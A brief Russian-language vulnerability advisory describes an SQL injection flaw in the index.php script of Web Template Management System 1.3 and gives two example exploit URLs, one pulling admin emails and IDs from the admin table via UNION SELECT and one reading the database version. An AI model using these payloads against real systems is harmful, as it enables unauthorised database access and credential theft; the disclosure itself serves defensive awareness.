Программа: Web Template Management System 1.3

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость
существует из-за недостаточной обработки входных данных сценарием index.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://localhost/index.php?action=readmore&id=
-1%20union%20select%200,1,concat(email,0x3a,userid,0x3a,adminid),3%20from%20admin/*

http://localhost/index.php?action=readmore&id=
-1%20union%20select%200,1,@@version,3/*



Оставить мнение